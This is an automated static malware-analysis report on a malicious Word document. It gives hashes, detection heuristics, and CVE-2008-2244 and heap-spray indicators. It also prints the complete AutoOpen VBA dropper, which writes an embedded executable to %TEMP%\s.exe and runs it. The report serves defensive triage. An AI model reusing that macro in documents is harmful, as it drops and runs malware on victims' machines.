Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c812046e38358fa3…

MALICIOUS

Office (OLE)

484.6 KB Created: 2018-02-05 22:35:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: 279a0160a0ba051a65437bd9aa4f7d46 SHA-1: eb54507e145508ee87c31d998d041a78f0532f2a SHA-256: c812046e38358fa3be9878283c9794d59e8d0babb44ee332654b6439bf03fa1a
630 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a Microsoft Word document that exploits CVE-2008-2244 to embed and execute a PE executable. The VBA macro 'autoopen' uses CreateObject to write the embedded executable to %TEMP%\s.exe and then executes it. This indicates a dropper functionality, aiming to download and run a second-stage payload.

Heuristics 18

  • CVE-2008-2244 — Microsoft Word record-parsing payload critical CVE likely CVE_2008_2244
    Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
  • ClamAV: Doc.Dropper.Agent-6583517-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6583517-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Sub autoopen()
Set f = CreateObject("scripting.filesystemobject"): Set e = f.getfile(ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name): Dim a(4 * 117014 - 1) As Byte: s = e.Size - UBound(a) - 1: Dim b(1375733) As Byte: Open (ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name) For Binary As #7: Get #7, 1, b: Close #7: For i = 0 To (e.Size - s - 1): a(i) = b(s + i): Next: Open (f.getspecialfolder(2) + "\\s.exe") For Binary As #1: Put #1, 1, a: Close #1: Shell (f.getspecial …
End Sub
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Sub autoopen()
Set f = CreateObject("scripting.filesystemobject"): Set e = f.getfile(ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name): Dim a(4 * 117014 - 1) As Byte: s = e.Size - UBound(a) - 1: Dim b(1375733) As Byte: Open (ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name) For Binary As #7: Get #7, 1, b: Close #7: For i = 0 To (e.Size - s - 1): a(i) = b(s + i): Next: Open (f.getspecialfolder(2) + "\\s.exe") For Binary As #1: Put #1, 1, a: Close #1: Shell (f.getspecial …
End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "NewMacros"
Sub autoopen()
Set f = CreateObject("scripting.filesystemobject"): Set e = f.getfile(ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name): Dim a(4 * 117014 - 1) As Byte: s = e.Size - UBound(a) - 1: Dim b(1375733) As Byte: Open (ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name) For Binary As #7: Get #7, 1, b: Close #7: For i = 0 To (e.Size - s - 1): a(i) = b(s + i): Next: Open (f.getspecialfolder(2) + "\\s.exe") For Binary As #1: Put #1, 1, a: Close #1: Shell (f.getspecial …
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x04 bytes found
    Disassembly
    Attempted x86 opcode disassembly
    0000E6F1  0404              add al, 4
0000E6F3  0404              add al, 4
0000E6F5  0404              add al, 4
0000E6F7  0404              add al, 4
0000E6F9  0404              add al, 4
0000E6FB  0404              add al, 4
0000E6FD  0404              add al, 4
0000E6FF  0404              add al, 4
0000E701  0404              add al, 4
0000E703  0404              add al, 4
0000E705  0404              add al, 4
0000E707  0404              add al, 4
0000E709  0404              add al, 4
0000E70B  0404              add al, 4
0000E70D  0404              add al, 4
0000E70F  0404              add al, 4
0000E711  0404              add al, 4
0000E713  0404              add al, 4
0000E715  0404              add al, 4
0000E717  0404              add al, 4
0000E719  0404              add al, 4
0000E71B  0404              add al, 4
0000E71D  0404              add al, 4
0000E71F  0404              add al, 4
0000E721  0404              add al, 4
0000E723  0404              add al, 4
0000E725  0404              add al, 4
0000E727  0404              add al, 4
0000E729  0404              add al, 4
0000E72B  0404              add al, 4
0000E72D  0404              add al, 4
0000E72F  0404              add al, 4
0000E731  0404              add al, 4
0000E733  0404              add al, 4
0000E735  0404              add al, 4
0000E737  0404              add al, 4
0000E739  0404              add al, 4
0000E73B  0404              add al, 4
0000E73D  0404              add al, 4
0000E73F  0404              add al, 4
0000E741  0404              add al, 4
0000E743  0404              add al, 4
0000E745  0404              add al, 4
0000E747  0404              add al, 4
0000E749  0404              add al, 4
0000E74B  0404              add al, 4
0000E74D  0404              add al, 4
0000E74F  0404              add al, 4
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 496,216 bytes but its declared streams total only 23,772 bytes — 472,444 bytes (95%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ocsp.verisign.com0 In document text (OLE body)
    • http://ocsp.verisign.com01In document text (OLE body)
    • http://www.sysinternals.comIn document text (OLE body)
    • http://www.microsoft.com/exportingIn document text (OLE body)
    • http://crl.verisign.com/tss-ca.crl0In document text (OLE body)
    • http://crl.verisign.com/ThawteTimestampingCA.crl0In document text (OLE body)
    • https://www.verisign.com/rpaIn document text (OLE body)
    • http://csc3-2009-2-crl.verisign.com/CSC3-2009-2.crl0DIn document text (OLE body)
    • https://www.verisign.com/rpa0In document text (OLE body)
    • http://csc3-2009-2-aia.verisign.com/CSC3-2009-2.cer0In document text (OLE body)
    • https://www.verisign.com/cps0*In document text (OLE body)
    • http://logo.verisign.com/vslogo.gif0In document text (OLE body)
    • http://crl.verisign.com/pca3.crl0In document text (OLE body)
    • http://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0In document text (OLE body)
    • http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl0ZIn document text (OLE body)
    • http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt0In document text (OLE body)
    • http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0XIn document text (OLE body)
    • http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0In document text (OLE body)
    • http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0TIn document text (OLE body)
    • http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0In document text (OLE body)
    • http://technet.microsoft.com/sysinternalsIn document text (OLE body)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 871 bytes
SHA-256: affa10d5c5e9b9feee09574938f08b2adc8fa3df7040a7ea7bea91e85bb29aaa
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub autoopen()
Set f = CreateObject("scripting.filesystemobject"): Set e = f.getfile(ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name): Dim a(4 * 117014 - 1) As Byte: s = e.Size - UBound(a) - 1: Dim b(1375733) As Byte: Open (ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name) For Binary As #7: Get #7, 1, b: Close #7: For i = 0 To (e.Size - s - 1): a(i) = b(s + i): Next: Open (f.getspecialfolder(2) + "\\s.exe") For Binary As #1: Put #1, 1, a: Close #1: Shell (f.getspecialfolder(2) + "\\s.exe")
End Sub
embedded_office_00006e00.exe embedded-pe Office MZ+PE at offset 0x6E00 468056 bytes
SHA-256: cd7f725fe6d9edfa24e26e12b558e81854d77211fedf1dd9075669896f5077b1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x04, SC_STR_VIRTUALALLOC, SC_STR_LOADLIBRARY Static shellcode analysis recovered API/import strings: VirtualAlloc, ExitProcess, LoadLibraryA, CreateFileA, GetProcAddress, ShellExecuteA

Open this report in the interactive analyzer, or submit your own file for analysis.